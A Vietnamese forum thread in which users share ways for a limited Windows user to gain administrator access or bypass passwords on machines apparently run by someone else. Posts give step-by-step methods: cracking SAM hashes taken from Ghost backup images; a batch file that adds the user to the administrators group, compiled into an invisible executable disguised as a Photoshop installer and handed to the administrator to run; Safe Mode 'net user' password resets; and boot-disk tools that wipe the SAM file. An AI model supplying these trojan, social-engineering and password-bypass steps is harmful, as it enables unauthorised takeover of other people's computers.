Bạn đọc chưa kĩ à :-/ có thấy dấu >> không ?. ">" != ">>" Hiểu chứ ?. @Bản thân mình chưa rõ đúng sai phải quấy thế nào, khẳng định không liền là sao đây :-?. 

skulldragon1st wrote:

Ko bác ạ, nếu mà tạo file mới vs nội dung của mình thì em cũng biết, vấn đề là insert thêm vào file đã có cơ 

Tìm hiểu thêm về Redirection sẽ rõ :D  

Line 1: OK Line 2: Fail This line is not important, have fun 

nếu 2 máy dùng chung 1 mạng wifi hoặc mạng LAN thì có thể dùng một số phần mềm sniff để lấy IP 

Mình có một cách này, tuy không chắc chắn thành công nhưng cũng có tỉ lệ may rủi. Nó phụ thuộc 2 yếu tố sau : 1. Khai thác bản GHOST mà các Sys Admin lưu trữ tại máy trạm ( để tiện bung GHOST khi gặp lỗi windows ). 2. Password của Administrator không quá dài và phức tạp. Và không bị đổi Password khi bung GHOST. Để thỏa 2 điều kiện trên thì tỉ lệ hơi thấp nhưng cũng thử xem sao. Chi tiết thực hiện như sau : 1. Sử dụng Ghost Explorer để VIEW file GHOST đó ( Tool này khỏi cài đặt, chạy trực tiếp và VIEW thôi ) 2. Vào file GHOST đó, tìm đến thư mục Windows/System32/Config lấy 3 file : SYSTEM , SAM , Security 3. Copy ( gửi mail hay gì đó ) sang một máy vi tính khác, cài phần mềm Advanced Password Recovery ( có tên gọi khác là Proactive System Password Recovery ) --> Vào Recovered hashes --> Chọn Manual --> Add 3 file tương ứng vào và cho dò tìm password ( phần mềm này dò theo kiểu Dictionary Attack nên password quá khó thì thua ) 4. Nếu tìm ra thì chương trình sẽ hiện password. Thử xem sao. @nnq2603 : nickname ở vietdown là yashiro, còn nhớ ko nhỉ :D  

Đã có cách giải quyết khá đơn giản nhưng việc sử dụng nó như thế nào hiệu quả thì tuỳ thuộc vào bản thân mình thôi. Đầu tiên tạo một file .bat với nội dung như thế này

net localgroup administrators user /add cls "C:\Documents and Settings\user\Local Settings\Temp\CS4\Setup.exe"  

tên user tuỳ thuộc từng người thôi, ở đây account "user" là đối tượng cần nâng lên administrator. Sau đó dùng chương trình "Bat to EXE" để convert thành file exe download

http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html  

Với Bat to EXE, mình sẽ check vào những option "Invisible application" và "Add administrator manifest", đặt một icon chương trình, ví dụ Photoshop rồi nhấn Compile. Vậy là đã có một chương trình "giả danh" trình cài đặt Photoshop rồi. Tiếp theo làm thế nào để kích hoạt nó, dễ thôi, bạn có thể nói với administrator đại loại như

Anh ơi, em có bản photoshop mới, anh cài giùm em nhé  

Vậy đó, mọi chuyện đã được giải quyết. 

Đến hiện tại bây giờ mình chưa biết là cậu đã làm được hay chưa nhưng mình xin trích dẫn lại bài viết trong link phía trên mình đã commend. -- Đối với win xp thì việc lấy lại pass vô cùng dễ dàng: B1: sau khi khởi dộng máy bạn ấn liên tiếp phím F8 (ấn trước khi vào màn hình load win) B2: Bạn chọn "Safe Mode" hoặc "Safe Mode Command Prompt" (chờ khoảng 2-4 minutes để win load file hệ thống) B3: Sau khi load file xong bạn sẽ thấy màn hình đăng nhập, lúc này bạn chỉ việc click vào "Administrator". B4: Một màn hình đen thui sẽ hiện ra với 4 chữ "Safe Mode" đặt ở 4 góc của màn hình, bạn vào Run gõ cmd (nếu bạn sử dụng Safe Mode, nếu bạn dùng Safe Mode Command Prompt thì cmd nó sẽ tự hiện ra) B5: Trong màn hình cmd bạn gõ net user <enter>, bạn sẽ thấy tất cả user đc liệt kê ra, bạn gõ tiếp net user tên_user mật_khẩu_mới <enter>, nếu bạn thâý ở phía dưới có xuất hiện dòng chữ ....Successful là bạn dã đổi thành công pass rùi. B6: Gõ exit và Restart lại máy và đăng nhập với mật khẩu mới của bạn. Nguồn: ebookso1.com -Mình không biết là bạn thấy dòng chử Boot từ CD hay thiết bị ngoài chổ nào ? và bạn có đọc hay không ?  

Sử dụng có thể xâm nhập Windows mà không cần mật khẩu nếu dùng dùng phần mềm Active Password Changer phiên bản 3.0 có sẵn trong đĩa CD Hiren 9.0. Đầu tiên, cho đĩa CD Hiren 9.0 vào ổ CD và vào BIOS thiết đặt lại thứ tự boot (khởi động), chọn boot đầu tiên là CD-ROM. Khởi động lại máy tính và chạy boot từ CD, chọn mục Password & Registry Tool ...> Active Password Changer v3.0. Trong phần OPTIONS: YOUR CHOICE: [ ] , chọn một trong hai lựa chọn: 1. Choose Logical Drive - Chọn phân vùng cần gỡ mật khẩu. 2. Search for MS SAM Database(s) on all hard and logical drive - Tìm trong tất cả các phân vùng. Bây giờ chỉ còn việc nhấn Enter và nhấn "Y" (Yes) khi yêu cầu trả lời là xong. Khởi động lại máy vào Windows như chủ nhân, không cần đến pasword và cũng chẳng còn password. Bạn đọc cũng có thể tải phần mềm tại đây Có rất nhiều cách phá Password Windows: - Dùng đĩa mềm khởi động DOS để xóa file sam (lưu password). - Dùng hệ điều hành live cd (Chạy trên đĩa) để xóa file sam. - Tạo Hiren boot cho USB, khởi động từ USB. Tuy nhiên cần lưu ý : Các cách trên đều phải can thiệp vào quá trình boot (khởi động) của Windows, nếu bị khóa Bios thì nó trở nên vô dụng. Trong khi đó, phương pháp của Adam là can thiệp sau khi Windows khởi động, dùng Linux kết nối (Vì Linux không bị ảnh hưởng bởi cách quản trị hệ thống Partition và các khóa file trên Windows). Phương pháp này rất hay, nó có thể là tiền đề cho các kiểu tấn công từ xa. Sưu tầm 

Các bạn không nên tranh cãi các vấn đề không liên quan đến chủ đang thảo luận! Bạn nnq2603 nên giữ thái độ hoà nhã với mọi người! Để giải quyết câu hỏi bạn nnq2603 đưa ra mình xin gợi ý như sau: - Limited user trên Windows có thể bị nhiễm virus không? (Khi nhiễm virus thì các file hệ thống cũng có thể bị thay đổi => Đòi quyền admin) - Virus làm cách nào để thực hiện điều đó? Và làm những điều tương tự như những con Virus đã làm - Đối với Windows XP thì một chương trình khởi động hệ thống sẽ có quyền gì? - Trong quá trình khởi động Windows thì AutoRun trên các ổ đĩa sẽ được thực thi khi nào? và thực thi với quyền gì? - Ky0 -